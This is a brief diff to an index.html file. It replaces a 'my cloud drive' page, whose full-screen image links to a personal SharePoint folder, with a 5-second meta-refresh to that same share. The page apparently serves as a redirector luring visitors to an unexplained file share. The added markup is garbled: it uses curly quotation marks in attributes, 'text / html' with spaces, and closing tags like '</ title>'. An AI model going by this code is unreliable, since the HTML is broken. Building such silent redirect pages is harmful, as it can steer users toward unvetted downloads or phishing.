--- a/index.html
+++ b/index.html
@@ -1,19 +1,8 @@
-<html lang="en">
-
-<head>
-
-<meta charset="UTF-8">
-
-<title>我的网盘</title>
-
-</head>
-
+<html> 
+<head> 
+<meta http-equiv =“Content-Language”content =“zh-CN”> 
+<meta HTTP-EQUIV =“Content-Type”CONTENT =“text / html; charset = gb2312”> 
+<meta http-equiv =“refresh”content =“5; url = https://nbcc3-my.sharepoint.com/:f:/g/personal/wktcpdi_z1_tn/Etlx0CSgevpJmNmxgt2IYmEB96Tgdm01hXDWkzW7VrIvdA”> 
+<title> Tao</ title> 
+</ head> 
 <body>
-
-<div id="Layer1" style="position:fixed; left:0px; top:0px; width:100%; height:100%">
-
-<a href="https://nbcc3-my.sharepoint.com/:f:/g/personal/wktcpdi_z1_tn/Etlx0CSgevpJmNmxgt2IYmEB96Tgdm01hXDWkzW7VrIvdA">
-
-<imgsrc="http://ki8.win/129.jpg" width="100%" height="100%"/>
-
-</body>
